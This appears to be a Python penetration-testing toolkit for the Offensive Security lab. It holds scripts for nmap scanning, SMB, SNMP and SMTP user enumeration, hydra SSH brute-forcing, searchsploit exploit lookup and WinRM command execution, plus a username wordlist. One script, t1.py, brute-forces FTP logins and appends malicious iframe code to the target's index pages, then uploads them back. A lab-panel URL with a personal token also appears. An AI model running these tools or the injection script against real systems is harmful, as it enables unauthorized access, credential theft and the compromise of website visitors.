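    print("\033[1;33m[*]\033[0;m Running general UDP nmap scans for " + ip_address)
    _nmap(["-sV", "-vv", "-Pn", "-O", "-sU", "-T4", "--top-ports", "20"], ip_address,
          "%s/%sU" % (reconf.exampth, ip_address))


def dualScan(ip_address):
    """Per-host worker: TCP scan now; the UDP scan stays disabled as in the original."""
    TCPScan(ip_address)
    # UDPScan(ip_address)


@fn_timer
def deepScan(ip_address):
    """Hand one host to ./deepscan.py and wait for it."""
    ip_address = ip_address.strip()   # the shell used to discard the trailing newline; argv does not
    print("\033[1;33m[*]\033[0;m Digging deeper into " + ip_address)
    subprocess.call(["./deepscan.py", ip_address])


def chkfolders():
    """Create every result folder named in recon.conf that is missing."""
    for dpth in (reconf.rootpth, reconf.labpath, reconf.rsltpth, reconf.exampth, reconf.nmappth):
        if not os.path.exists(dpth):
            os.makedirs(dpth)


def createList(ipadr):
    """Ping-sweep ``ipadr`` and write the responding addresses, one per line, to ``reconf.olst``.

    nmap's greppable output (``reconf.opth``) is parsed line by line: the second
    space-separated field is the address on ``Host: 1.2.3.4 () Status: Up``
    lines, and starts with a letter on the ``# Nmap ...`` header/footer lines,
    which are dropped.  Lines with fewer than two fields are skipped instead
    of raising IndexError.
    """
    scanner = nmap.PortScanner()
    scanner.scan(ipadr, arguments="-sP -PS -n -oG %s " % (reconf.opth))
    with open(reconf.opth) as gnmap, open(reconf.olst, "w") as live:
        for line in gnmap:
            fields = line.split(" ")
            if len(fields) < 2:
                continue
            if re.match('[a-zA-Z]', fields[1]) is None:
                live.write("%s\n" % (fields[1]))


def vpnstatus():
    """Return the number of output lines from ``ifconfig tap0`` (0 when the
    interface is absent or ifconfig fails); the caller treats >1 as "VPN up"."""
    try:
        output = subprocess.check_output(["ifconfig", "tap0"])
    except (OSError, subprocess.CalledProcessError):
        return 0
    return len(output.splitlines())


if __name__ == '__main__':
    # Check if VPN to the Offsec lab is up
    if not vpnstatus() > 1:
        print("You forgot to connect to the lab")
        sys.exit()

    # Make sure the folders exist
    chkfolders()

    # Create list of active IPs
    createList(reconf.iprange)

    print("Intel Gathering")
    with open(reconf.olst, 'r') as hosts:
        jobs = [multiprocessing.Process(target=dualScan, args=(scanip,)) for scanip in hosts]

    for job in jobs:
        job.start()

    for job in jobs:
        job.join()
        print("%s.exitcode = %s" % (job.name, job.exitcode))

    # "Deeper Dive" stage, disabled in the original and left disabled here:
    # it would fork one deepScan() process per address in reconf.olst and
    # report each exit code exactly like the loop above.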
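#!/usr/bin/env python
# ---- /rpcrecon.py ----
"""Try an SMB null session with rpcclient against one host and print what it returns."""
import subprocess
import sys

import reconf
from reconf import *

if len(sys.argv) != 2:
    print("Usage: rpcrecon.py <ip address>")
    sys.exit(0)

ip_address = sys.argv[1].strip()

# argv form instead of a shell string: "rpcclient -U %s %s" % ("", ip) lost the
# empty user under shell=True, so the address became the -U argument and
# rpcclient had no target.  -N stops it prompting for the (empty) password so
# the script cannot hang waiting on a terminal.
RPC = ["rpcclient", "-U", "", "-N", ip_address]
results = subprocess.check_output(RPC).strip()   # CalledProcessError if rpcclient fails

if results:
    print(results)


#!/usr/bin/env python
# ---- /setup.py ----
"""One-time tooling setup for the recon scripts.

Installs the extra NSE scripts, the wkhtmltoimage binary, the result folders
from recon.conf, the Python modules the other scripts import and the vulscan
NSE bundle.  Downloads go through ``_fetch``; give it a ``sha256`` once a
trusted digest is recorded so a tampered file is discarded instead of being
extracted or copied into PATH.
"""
import binascii
import hashlib
import os
import subprocess
import sys
import pip

import reconf
from reconf import *


def chkfolders():
    """Create the result folders named in recon.conf that are missing."""
    for dpth in (reconf.rsltpth, reconf.exampth, reconf.nmappth):
        if os.path.exists(dpth):
            print("[+] We're okay, %s folder exists" % (dpth))
        else:
            print("[!] %s folder is missing, creating it now..." % (dpth))
            os.makedirs(dpth)


def hashfile(afile, hasher, blocksize=65536):
    """Feed ``afile`` (opened in binary mode) through ``hasher`` and return the raw digest."""
    buf = afile.read(blocksize)
    while len(buf) > 0:
        hasher.update(buf)
        buf = afile.read(blocksize)
    return hasher.digest()


def _fetch(url, dest_dir=None, sha256=None):
    """Download ``url`` with ``wget -c`` (into ``dest_dir`` when given) and return the local path.

    When ``sha256`` (hex) is supplied the file is hashed with ``hashfile``; on a
    mismatch it is deleted and RuntimeError is raised.  The callers below pass
    no digest because none is pinned in this repo -- TODO(owner): record them,
    especially for the two plain-HTTP sources.
    """
    name = url.rsplit('/', 1)[-1]
    cmd = ["wget", "-c", url]
    if dest_dir:
        cmd += ["-P", dest_dir]
    subprocess.call(cmd)
    path = os.path.join(dest_dir, name) if dest_dir else name
    if sha256 is not None and os.path.isfile(path):
        with open(path, 'rb') as fh:
            got = binascii.hexlify(hashfile(fh, hashlib.sha256())).decode('ascii')
        if got != sha256.lower():
            os.remove(path)
            raise RuntimeError("sha256 mismatch for %s: %s != %s" % (path, got, sha256))
    return path


def upnsedb(url, sha256=None):
    """Fetch one NSE script into ``reconf.nsepth`` and refresh nmap's script database.

    The script name is taken from the URL; the original read a ``nsefile``
    global that only happened to be set by the caller's loop.
    """
    nsefile = url.rsplit('/', 1)[-1]
    print("[!] Fetching %s " % (nsefile))
    _fetch(url, reconf.nsepth, sha256)
    print("[+] Updating Nmap database with %s " % (nsefile))
    subprocess.call(["nmap", "--script-updatedb"])


def install(package):
    """pip-install ``package`` into the running interpreter.

    Uses ``python -m pip`` instead of ``pip.main()``, which pip removed in 10.0.
    """
    subprocess.check_call([sys.executable, "-m", "pip", "install", package])


def _installed_packages():
    """Return the lower-cased project names of the distributions pip can see."""
    try:
        return set(d.project_name.lower() for d in pip.get_installed_distributions())
    except AttributeError:   # pip >= 10 dropped that API; ask the CLI instead
        output = subprocess.check_output([sys.executable, "-m", "pip", "list", "--format=freeze"])
        return set(line.split("==")[0].strip().lower()
                   for line in output.decode("utf-8", "replace").splitlines() if "==" in line)


if __name__ == '__main__':
    print("[*] Installing missing NSE scripts...")
    nse_sources = {
        'http-screenshot-html.nse': 'https://raw.githubusercontent.com/afxdub/http-screenshot-html/master/http-screenshot-html.nse',
        'smb-check-vulns.nse': 'https://svn.nmap.org/nmap-exp/scriptsuggest/scripts/smb-check-vulns.nse',
    }
    for nsefile in ('http-screenshot-html.nse', 'smb-check-vulns.nse'):
        if os.path.isfile(os.path.join(reconf.nsepth, nsefile)):
            print("[+] %s is already installed" % (nsefile))
        else:
            upnsedb(nse_sources[nsefile])

    FN = "wkhtmltoimage"
    TAR = "wkhtmltox-0.12.3_linux-generic-amd64.tar.xz"
    # Plain-HTTP download of a binary that ends up in /usr/local/bin with no
    # signature or pinned digest -- pass sha256= to _fetch once one is known.
    URL = "http://download.gna.org/wkhtmltopdf/0.12/0.12.3/%s" % (TAR)
    EXT = "wkhtmltox/bin/%s" % (FN)
    BIN = "/usr/local/bin"
    BFN = "%s/%s" % (BIN, FN)
    print("[*] Checking for the installation of %s..." % (FN))
    if os.path.isfile(BFN):
        print("[+] We're good: %s is installed" % (FN))
    else:
        # The original tested `if os.path.isfile(TAR)` here, so the archive was
        # only "downloaded" when it already existed and never otherwise.
        if not os.path.isfile(TAR):
            print("[+] Downloading wkhtmltoimage...")
            _fetch(URL)
        if os.path.isfile(TAR):
            print("[+] Extracting %s file %s to %s..." % (TAR, EXT, BIN))
            subprocess.call(["tar", "-Jxf", TAR])
            subprocess.call(["cp", EXT, BIN])
        if os.path.isfile(BFN):
            print("[+] %s is installed to %s" % (FN, BIN))
        else:
            print("[!] %s not found in %s" % (FN, BIN))

    print("[*] Checking for the necessary folders...")
    chkfolders()

    print("[*] Checking if the required modules are installed...")
    pkgs = ['ftputil', 'pywinrm', 'xsser', 'python-libnmap', 'python-nmap', 'easyprocess']
    fipkgs = _installed_packages()
    for pkgname in pkgs:
        if pkgname.lower() in fipkgs:
            print("[+] The %s module is installed..." % (pkgname))
        else:
            print("[!] The %s module hasn't been installed yet..." % (pkgname))
            print("[!] Installing %s module now..." % (pkgname))
            install(pkgname)

    TAR = "nmap_nse_vulscan-2.0.tar.gz"
    URL = "http://www.computec.ch/projekte/vulscan/download/%s" % (TAR)   # plain HTTP, unverified (see _fetch)
    VPT = "%s/vulscan" % (reconf.nsepth)
    print("[*] Checking if vulnscan is installed...")
    if os.path.isdir(VPT):
        print("[+] We're good: vulscan is installed")
    else:
        if not os.path.isfile(TAR):
            print("[+] Downloading %s.." % (TAR))
            _fetch(URL)
        # Extract even when the archive was already on disk, so a previously
        # downloaded but never-unpacked bundle still gets installed.
        print("[+] Extracting %s to %s..." % (TAR, reconf.nsepth))
        subprocess.call(["tar", "-xzvf", TAR, "-C", reconf.nsepth])
        subprocess.call(["cp", "%s/vulscan.nse" % (VPT), reconf.nsepth])
        subprocess.call(["nmap", "--script-updatedb"])


#!/usr/bin/env python
# ---- /smbrecon.py ----
"""SMB enumeration for one host: nmap smb-check-vulns plus enum4linux, saved under reconf.exampth."""
import os
import subprocess
import sys

import reconf
from reconf import *

if len(sys.argv) != 2:
    print("Usage: smbrecon.py <ip address>")
    sys.exit(0)

ip_address = sys.argv[1].strip()


def cat(fname):
    """Print the contents of ``fname``."""
    with open(fname, 'r') as fn:
        print(fn.read())


# unsafe=1 enables checks that can crash the target's SMB service; fine for
# the lab this tool is written for, not for anything in production.
NMAPS = ["nmap", "-sV", "-Pn", "-n", "--script=smb-check-vulns", "--script-args=unsafe=1",
         "-oA", "%s/%s_smb" % (reconf.exampth, ip_address), ip_address]
results = subprocess.check_output(NMAPS)
if results:
    print(results)

E4L = ["enum4linux", "-a", ip_address]
results = subprocess.check_output(E4L)
if results:
    ofile = "%s/%s_enum4linux.txt" % (reconf.exampth, ip_address)
    try:
        with open(ofile, 'a') as out:
            out.write(results)
    except IOError:
        print("ERROR: Couldn't write to %s" % (ofile))

    if os.path.isfile(ofile):
        cat(ofile)
    else:
        print("%s doesn't exist" % (ofile))


#!/usr/bin/python
# ---- /smtprecon.py ----
"""Enumerate SMTP users with VRFY, one fresh connection per name in reconf.fzzlst."""
import socket
import sys

import reconf
from reconf import *

SMTP_PORT = 25
SOCKET_TIMEOUT = 10   # seconds; a silent server used to block recv() forever

if len(sys.argv) not in (2, 3):
    print("Usage: smtprecon.py <ip address> [port]")
    sys.exit(0)

host = sys.argv[1].strip()
port = int(sys.argv[2]) if len(sys.argv) == 3 else SMTP_PORT


def vrfy(host, port, name):
    """Open an SMTP session, send HELO then ``VRFY name`` and return the VRFY reply.

    The socket is always closed, including when the caller exits on the reply.
    """
    s = socket.create_connection((host, port), SOCKET_TIMEOUT)
    try:
        s.recv(1024)                              # banner
        s.send('HELO test@test.org \r\n')
        s.recv(1024)
        s.send('VRFY ' + name + '\r\n')
        return s.recv(1024)
    finally:
        s.close()


print("INFO: Trying SMTP Enum on " + host)
with open(reconf.fzzlst, 'r') as names:
    for name in names:
        name = name.strip()
        if not name:
            continue
        result = vrfy(host, port, name)
        if ("not implemented" in result) or ("disallowed" in result):
            sys.exit("INFO: VRFY Command not implemented on " + host)
        # 250 = user exists; 252 = "cannot VRFY, will accept anyway" and is
        # excluded.  The original read as `A or (B and C)` by precedence.
        if ("250" in result or "252" in result) and "Cannot VRFY" not in result:
            print("[*] SMTP VRFY Account found on " + host + ": " + name)


#!/usr/bin/env python
# ---- /snmprecon.py ----
"""SNMP recon for one host: onesixtyone community probe, full snmpwalk, nmap SNMP scripts."""
import subprocess
import sys

import reconf
from reconf import *

if len(sys.argv) != 2:
    print("Usage: snmprecon.py <ip address>")
    sys.exit(0)

ip_address = sys.argv[1].strip()


def _os_from_onesixtyone(output):
    """Return the OS description onesixtyone printed, or None when no SNMP answer was seen.

    Windows agents answer with "... Software: <desc>", Linux ones with
    "[public] <desc>"; the text after that marker is what gets reported.  If the
    marker is missing the raw output is returned instead of raising IndexError.
    """
    for needle, marker in (("Windows", "Software: "), ("Linux", "[public] ")):
        if needle in output:
            parts = output.split(marker, 1)
            return parts[1] if len(parts) > 1 else output
    return None


results = subprocess.check_output(["onesixtyone", ip_address]).strip()
osdesc = _os_from_onesixtyone(results) if results else None

if osdesc is not None:
    print("[*] SNMP running on " + ip_address + "; OS Detect: " + osdesc)
    # Default "public" community over v1 (the lab default).  stdout goes straight
    # to the file rather than through a shell redirect.
    walkfile = "%s/%s_snmpwalk.txt" % (reconf.rsltpth, ip_address)
    with open(walkfile, "w") as out:
        subprocess.check_call(["snmpwalk", "-c", "public", "-v1", ip_address, "1"], stdout=out)

NMAPSCAN = ["nmap", "-vv", "-sV", "-sU", "-Pn", "-p", "161,162",
            "--script=snmp-netstat,snmp-processes", ip_address]
results = subprocess.check_output(NMAPSCAN)
resultsfile = reconf.rsltpth + "/" + ip_address + "_snmprecon.txt"
with open(resultsfile, "w") as f:   # the original called `f.close` without (), leaving the file open
    f.write(results)


#!/usr/bin/env python
# ---- /sshrecon.py ----
"""Brute-force SSH on one host:port with hydra, using the user/password lists from recon.conf."""
import subprocess
import sys

import reconf
from reconf import *

if len(sys.argv) != 3:
    print("Usage: sshrecon.py <ip address> <port>")
    sys.exit(0)

ip_address = sys.argv[1].strip()
port = sys.argv[2].strip()

print("INFO: Performing hydra ssh scan against " + ip_address)
# Same argument order as the original.  NOTE(review): in hydra's usage `-u`
# is a flag (loop users, not passwords) that takes no value, so the address
# is really hydra's positional target here -- it works, but verify intent.
HYDRA = ["hydra", "-L", reconf.usrlst, "-P", reconf.pwdlst, "-f",
         "-o", "%s/%s_sshhydra.txt" % (reconf.rsltpth, ip_address),
         "-u", ip_address, "-s", port, "ssh"]
try:
    results = subprocess.check_output(HYDRA)
except OSError:
    sys.exit("ERROR: hydra is not installed or not in PATH")
except subprocess.CalledProcessError as err:
    # hydra exits non-zero when nothing was found; whatever it printed is still worth scanning
    results = err.output or ""

found = [line for line in results.split("\n") if "login:" in line]
for line in found:
    print("[*] Valid ssh credentials found: " + line)
if not found:
    print("INFO: No valid ssh credentials found")


# ---- /support.txt ----
# https://10.70.70.70/oscpanel/labcpanel.php?md=b65c572dd9b210b3dff52be9b4c7997b&pid=189465&servers=0
# https://forums.offensive-security.com/
# NOTE(review): the md= and pid= parameters look like a personal lab-panel
# token; treat that URL as a secret and keep it out of the repository.


#!/usr/bin/env python
# ---- /t.py ----
"""Scratch probe: send IP()/ftp() with scapy and print the answered/unanswered lists."""
import scapy
from scapy.all import *

# NOTE(review): `ftp` is not a layer scapy ships; presumably provided by the
# star import from a local module -- confirm before relying on this script.
output = sr(IP(dst='192.168.31.204') / ftp())
print("0: %s" % (output,))        # output is a 2-tuple; the bare `% output` form unpacked it
result, unan = output
print("R: %s" % (result,))


#!/usr/bin/env python
# ---- /t1.py ----
"""Log in over FTP with hydra-found creds, find index pages and append reconf.iframe1 to them.

Destructive by design: it rewrites content on the target host.  Only point
it at lab machines you are authorised to modify.
"""
import argparse
import os
import re
import subprocess
import sys

import ftputil
import ipaddr

import reconf
from reconf import *

parser = argparse.ArgumentParser(description='Scan for FTP websites using creds discovered with hydra, search for index files append malicous code into it, then upload it back')
parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed')

args = parser.parse_args()
try:
    ip_address = str(ipaddr.IPAddress(args.ip))
except ValueError:
    print("Try again...")
    sys.exit()

INDEX_PAGE = re.compile(r'^(index)[.](htm|html|asp|php)')


def ftpLogin(ip_address, u, p):
    """Return an ftputil.FTPHost logged in as ``u``/``p``, or None when the login is refused."""
    try:
        ftp = ftputil.FTPHost(ip_address, u, p)
    except OSError:                          # ftputil's FTPOSError derives from OSError
        print("[-] %s - FTP using creds %s:%s is not allowed" % (ip_address, u, p))
        return None
    print("[+] %s - FTP using %s/%s is Permitted" % (ip_address, u, p))
    return ftp


def injectPage(fname):
    """Append reconf.iframe1 to the local copy ``fname``."""
    print("Inserting code into %s" % fname)
    with open(fname, 'a') as f:
        f.write(reconf.iframe1)


def _hydra_creds(fnmap):
    """Yield unique (user, password) pairs from a hydra ``-o`` file, in file order.

    Relies on hydra's ``[port][svc] host: H   login: U   password: P`` layout
    (fields 4 and 6 after whitespace splitting); shorter lines are skipped
    instead of raising IndexError.
    """
    seen = set()
    with open(fnmap, 'r') as searchfile:
        for line in searchfile:
            if 'login:' not in line or 'password:' not in line:
                continue
            parts = re.split(r'\s+', line)
            if len(parts) < 7:
                continue
            u, p = parts[4].strip(), parts[6].strip()
            if (u, p) not in seen:
                seen.add((u, p))
                yield u, p


def _inject_index_pages(ftp, u, p):
    """Walk the FTP tree, print every entry and patch each index page found."""
    for root, dirs, files in ftp.walk("/", topdown=True, onerror=None):
        for dlst in dirs:
            if dlst != "":
                print("%s\n" % dlst)
        for fname in files:
            if fname == "":
                continue
            print("%s/%s\n" % (root, fname))
            if not INDEX_PAGE.search(fname):
                continue
            print("[+] Found default page %s at %s" % (fname, root))
            remote = "%s/%s" % (root, fname)
            try:
                print("Downloading %s with U %s P %s" % (fname, u, p))
                ftp.download(remote, fname)
                injectPage(fname)
                ftp.upload_if_newer(fname, remote)
            except (OSError, IOError) as err:
                print("[-] Could not patch %s: %s" % (remote, err))   # was silently swallowed


fnmap = "%s/%s_ftp_hydra.txt" % (reconf.rsltpth, ip_address)
print("\033[1;31m [!] \033[0;m Checking if %s exists" % (fnmap))
if not os.path.isfile(fnmap):
    print("\033[1;31m [!] \033[0;m %s doesn't exists, running brute force to find creds" % (fnmap))
    if os.path.isfile('hydra.restore'):
        os.remove('hydra.restore')
    try:
        subprocess.call(["./brutepwd.py", "-ip", ip_address, "-s", "ftp", "-hy"])
    except OSError as err:
        print("[-] Could not run brutepwd.py: %s" % err)
    print("\033[1;31m [!] \033[0;m Brute force of %s is completed." % (ip_address))

print("\033[1;31m [!] \033[0;m Parsing %s for creds" % (fnmap))
try:
    for u, p in _hydra_creds(fnmap):
        print("\033[1;31m [!] \033[0;m Using %s:%s creds to FTP into %s" % (u, p, ip_address))
        ftp = ftpLogin(ip_address, u, p)
        if ftp is None:
            continue      # the original carried on to ftp.walk() and hid the AttributeError
        try:
            _inject_index_pages(ftp, u, p)
        finally:
            ftp.close()
except IOError as err:
    print("[-] %s" % err)   # hydra output still missing after the brute-force step
finally:
    print("\033[1;31m [!] \033[0;m Assessment Complete.")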
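--------------------------------------------------------------------------------
/users.txt:
--------------------------------------------------------------------------------
root
abe
admin
Administrator
alice
anonymous
backup
bin
bob
daemon
david
dhcp
games
gary
gnats
Guest
HelpAssistant
irc
IEuser
IUSR_BOB
IUSR_ORACLE
IUSR_SRV2
IWAM_BOB
IWAM_ORACLE
IWAM_SRV2
joe
john
klog
lisa
list
loneferret
lp
main
man
mark
mysql
ned
news
nick
nobody
postfix
proxy
sqlusr
sshd
SUPPORT_388945a0
sync
sys
syslog
todd
TsInternetUser
uucp
www-data
--------------------------------------------------------------------------------
/vulnrecon.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
"""vulnrecon.py - run nmap's ``vuln`` NSE scripts against one host and look up
matching exploits with searchsploit.

Usage: vulnrecon.py <ip_address>

Flow:
  1. read ``<reconf.exampth>/<ip>.nmap`` (from an earlier ``nmap -oA`` run) to
     pick the open ports;
  2. run ``nmap --script vuln`` on those ports, writing ``<ip>_vuln.{nmap,gnmap,xml}``;
  3. parse ``<ip>.xml`` with libnmap and, for hosts fingerprinted as
     Microsoft/Windows, append searchsploit hits per service to
     ``<ip>_exploitdb.txt``.

Security note: service banners come from the scanned host.  They are treated
as untrusted - they are only ever passed to searchsploit as argv elements
(never through a shell) and are matched as literal text, never as regexes.
"""
from __future__ import print_function

from xml.etree import ElementTree
from libnmap.parser import NmapParser
import subprocess
import sys
import os
import re
import reconf

# Labels libnmap puts in a service banner ("product: X version: Y ostype: Z ...").
_BANNER_LABELS = ('product', 'version', 'extrainfo', 'hostname', 'ostype')
_BANNER_LABEL_RE = re.compile(r'(%s):' % '|'.join(_BANNER_LABELS))

# "80/tcp   open  http" style lines in nmap normal output (-oN / -oA .nmap).
_OPEN_PORT_RE = re.compile(r'^(\d+)/(?:tcp|udp)\s+open\b')

# Accept plain IPv4/IPv6/hostname tokens only: ip_address is spliced into file
# paths under reconf.exampth, so keep path separators and shell noise out.
_HOST_TOKEN_RE = re.compile(r'^[A-Za-z0-9._:-]+$')


def opnPORTS(ip_address):
    """Return the open ports recorded in ``<exampth>/<ip>.nmap`` as a sorted,
    comma-separated string such as ``"22,80,443"``.

    Returns None when the file is missing, unreadable, or lists no open ports;
    the caller then scans nmap's default port set instead.  The file is parsed
    in Python rather than via ``cat | grep | cut`` under ``shell=True``.
    """
    fnmap = "%s/%s.nmap" % (reconf.exampth, ip_address)
    print("\033[1;31m [!] \033[0;m Parsing %s for identifying open ports" % (fnmap))
    if not os.path.isfile(fnmap):
        print("\033[1;38m [!] \033[0;m %s is missing. Run nmap with the -oA option" % (fnmap))
        return None
    ports = set()
    try:
        with open(fnmap, 'r') as fh:
            for line in fh:
                m = _OPEN_PORT_RE.match(line)
                if m:
                    ports.add(int(m.group(1)))
    except (IOError, OSError) as exc:
        print("\033[1;38m [!] \033[0;m Could not read %s: %s" % (fnmap, exc))
        return None
    if not ports:
        return None
    return ','.join(str(p) for p in sorted(ports))


def vulnCHK(ip_address):
    """Run ``nmap -sV --script vuln`` against ``ip_address``.

    The scan is restricted to the ports from opnPORTS() when they are known and
    otherwise left to nmap's default port list.  Output goes to
    ``<exampth>/<ip>_vuln.{nmap,gnmap,xml}``.  nmap is invoked with an argv list,
    not a shell string.
    """
    oprts = opnPORTS(ip_address)
    cmd = ['nmap', '-sV', '-vv', '-Pn', '-n']
    if oprts:
        cmd += ['-p', oprts]
    # unsafe=1 turns on the intrusive NSE checks (DoS-style probes included);
    # they can crash fragile services, which is accepted for an assessment box.
    cmd += ['--script', 'vuln', '--script-args=unsafe=1',
            '-oA', '%s/%s_vuln' % (reconf.exampth, ip_address), ip_address]
    print("[+] Executing - %s" % (' '.join(cmd)))
    print("\033[1;33m[*]\033[0;m Running general vuln scans for " + ip_address)
    try:
        subprocess.call(cmd)
    except OSError as exc:
        # nmap not installed / not on PATH: report instead of dying silently.
        print("[!] Could not run nmap: %s" % (exc))


def test_patterns(text, patterns=None):
    """Return ``(start, end)`` of the first match of the first pattern in
    ``patterns`` that occurs in ``text``, or None when nothing matches.

    Kept for compatibility; the banner parsing below uses parse_banner() instead.
    """
    for pattern in (patterns or []):
        for match in re.finditer(pattern, text):
            return (int(match.start()), int(match.end()))
    return None


def parse_banner(banner):
    """Split a libnmap service banner into ``{label: value}``.

    ``"product: IIS httpd version: 6.0 ostype: Windows"`` becomes
    ``{'product': 'iis httpd', 'version': '6.0', 'ostype': 'windows'}``.  Values
    are stripped and lower-cased; labels absent from the banner are absent from
    the dict.  Text before the first label is ignored.
    """
    fields = {}
    hits = list(_BANNER_LABEL_RE.finditer(banner))
    for i, hit in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(banner)
        fields[hit.group(1)] = banner[hit.end():end].strip().lower()
    return fields


def prodreplace(text):
    """Drop the first noise word found in ``text`` so the remaining words form a
    usable searchsploit term.  Returns ``text`` unchanged when no noise word
    occurs (the previous version returned None here, and ``.strip()`` on it
    aborted the whole run).
    """
    tags = ['windows', 'xp', '98', '2000', 'enterprise edition', 'http server powered by',
            'transaction coordinator', 'for', 'httpd', 'listener', 'service', 'release']
    for tag in tags:
        if tag in text:
            return text.replace(tag, '')
    return text


def osreplace(text):
    """Like prodreplace() for OS strings; returns ``text`` unchanged when no tag matches."""
    tags = ['windows', 'enterprise edition release']
    for tag in tags:
        if tag in text:
            return text.replace(tag, '')
    return text


def _short_version(ver):
    """Trim ``a.b.c.d`` to ``a.b`` (searchsploit matches better on the major.minor)."""
    parts = ver.split('.')
    if len(parts) > 2:
        return '.'.join(parts[:2])
    return ver


def service_terms(service):
    """Derive ``(prod, ver, os_name)`` searchsploit terms for one libnmap service.

    Port-based overrides map well-known ports to short product names (445 ->
    ``smb``, 3389 -> ``rdp``, ...).  When the banner carries no ``ostype`` the OS
    defaults to ``windows`` - callers only reach this for Windows hosts.
    """
    port = service.port
    banner = (service.banner or '').replace('Microsoft ', '')
    fields = parse_banner(banner) if banner else {}
    if 'product' not in fields:
        # Nothing parsable: keep the old fallback behaviour.
        return ('https' if port == 443 else ''), '', 'windows'

    prod = fields['product']
    ver = fields.get('version', '')
    os_name = fields.get('ostype', 'windows')
    extra = fields.get('extrainfo', '')

    if port == 443:
        prod, os_name = 'https', 'windows'
    if port == 445 and 'microsoft-ds' in prod:
        prod = 'smb'
    if port == 139 and 'netbios-ssn' in prod:
        prod = 'netbios'
    # Parenthesised: the old `a and b or c` applied "tns"/"apache" to every
    # service on 1526 / 7778 regardless of its banner.
    if 'tns' in prod and port in (1521, 1526):
        prod = 'tns'
    if 'apache' in prod and port in (7777, 7778):
        prod = 'apache'
    if port == 2100 and 'ftpd' in prod:
        prod = 'ftp'
    if port == 3389 and 'terminal' in prod:
        prod = 'rdp'
    if 'oracle' in extra:
        prod = prodreplace(extra).strip()
    if len(prod.split()) > 1:
        prod = prodreplace(prod).strip()
    ver = _short_version(ver)
    if len(os_name.split()) > 1:
        os_name = osreplace(os_name).strip()
    return prod, ver, os_name


def _searchsploit(terms):
    """Run ``searchsploit`` with ``terms`` (each term split on whitespace, as the
    old shell string did) and return its stdout as text.  No shell is involved,
    so banner-derived terms cannot inject commands.

    Raises OSError / subprocess.CalledProcessError on failure.
    """
    args = ' '.join(t for t in terms if t).split()
    out = subprocess.check_output(['searchsploit'] + args)
    if not isinstance(out, str):
        out = out.decode('utf-8', 'replace')
    return out


def ssploit(prod, ver, os):
    """Look up exploits for a service.

    First query: ``prod ver`` (``prod os`` for RDP on Windows).  If that output
    does not mention ``prod`` or ``ver``, retry with ``prod os``.  Matching is a
    literal substring test - the old ``re.search("prod|ver")`` treated banner
    text as a regex.  Returns the matching searchsploit output, or None when
    neither query produced a hit or searchsploit could not be run.
    (``os`` is the OS term here, not the module; this function does not use
    the module.)
    """
    if 'rdp' in prod and 'windows' in os:
        first = (prod, os)
    else:
        first = (prod, ver)
    try:
        results = _searchsploit(first)
        if prod in results or ver in results:
            return results
        results = _searchsploit((prod, os))
        if prod in results or os in results:
            return results
    except (OSError, subprocess.CalledProcessError):
        print("[!]: No exploits found for %s %s" % (prod, ver))
    return None


def main(ip_address):
    """Scan ``ip_address`` and append searchsploit hits to ``<ip>_exploitdb.txt``."""
    if not _HOST_TOKEN_RE.match(ip_address):
        print("[!] %s does not look like a host address" % (ip_address))
        sys.exit(1)

    vulnCHK(ip_address)

    xmlfile = "%s/%s.xml" % (reconf.exampth, ip_address)
    # Cheap well-formedness check first so a missing/truncated XML gives a
    # readable message rather than a traceback from the libnmap parser.
    try:
        with open(xmlfile, 'rt') as fh:
            ElementTree.parse(fh)
    except (IOError, OSError, ElementTree.ParseError) as exc:
        print("[!] Cannot parse %s: %s" % (xmlfile, exc))
        sys.exit(1)

    rep = NmapParser.parse_fromfile(xmlfile)
    ofile = "%s/%s_exploitdb.txt" % (reconf.exampth, ip_address)

    for _host in rep.hosts:
        # Last OS match wins, as before; "Linux" when nmap produced none.
        host_os = _host.os.osmatches[-1].name if _host.os.osmatches else "Linux"
        if not re.match('Microsoft|Windows', host_os):
            continue

        for service in _host.services:
            prod, ver, os_name = service_terms(service)
            print("[+] Performing searchsploit on Port: " + '{0: <5}'.format(service.port),
                  "Prod: " + '{0: <15}'.format(prod),
                  "Version: " + '{0: <15}'.format(ver),
                  "OS: " + '{0: <15}'.format(os_name))

            if not ((os_name and prod) or ver):
                continue
            result = ssploit(prod, ver, os_name)
            if result is None:
                # Nothing to record; the old code wrote a header and then
                # failed on write(None).
                continue
            rhead = "\n IP Address: %s Port: %s \n" % (ip_address, service.port)
            try:
                with open(ofile, 'a') as out:
                    out.write(rhead)
                    out.write(result)
            except (IOError, OSError):
                print("ERROR: Couldn't write to %s" % (ofile))


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("Usage: vulnrecon.py <ip_address>")
        sys.exit(0)
    main(sys.argv[1].strip())
--------------------------------------------------------------------------------
/winrmrecon.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
"""winrmrecon.py - run one command over WinRM and print its exit code and output.

Usage: winrmrecon.py <host> <user> [command [args ...]]   (default: ipconfig /all)

The password comes from the ``WINRM_PASS`` environment variable or an
interactive prompt; the previous version hard-coded a lab host and account
(``IEuser``/``toor``) in the repository.
"""
from __future__ import print_function

import getpass
import os
import sys

import winrm


def main(argv):
    """Connect with the given credentials, run the command, echo status/stdout/stderr.

    Returns 0 when the remote command exited 0, 1 otherwise, 2 on usage error.
    """
    if len(argv) < 3:
        print("Usage: winrmrecon.py <host> <user> [command [args ...]]")
        return 2
    host, user = argv[1], argv[2]
    cmd = argv[3:] or ['ipconfig', '/all']
    password = os.environ.get('WINRM_PASS')
    if not password:
        password = getpass.getpass('WinRM password for %s@%s: ' % (user, host))

    # NOTE(review): no transport= is passed, so pywinrm's default applies.
    # Confirm that default (HTTP on 5985 with basic auth - credentials are
    # only base64-encoded on the wire) is acceptable for the lab network
    # before pointing this at anything else; pass transport='ssl' otherwise.
    s = winrm.Session(host, auth=(user, password))
    r = s.run_cmd(cmd[0], cmd[1:])

    print(r.status_code)
    print(r.std_out)
    print(r.std_err)
    return 0 if r.status_code == 0 else 1


if __name__ == '__main__':
    sys.exit(main(sys.argv))
--------------------------------------------------------------------------------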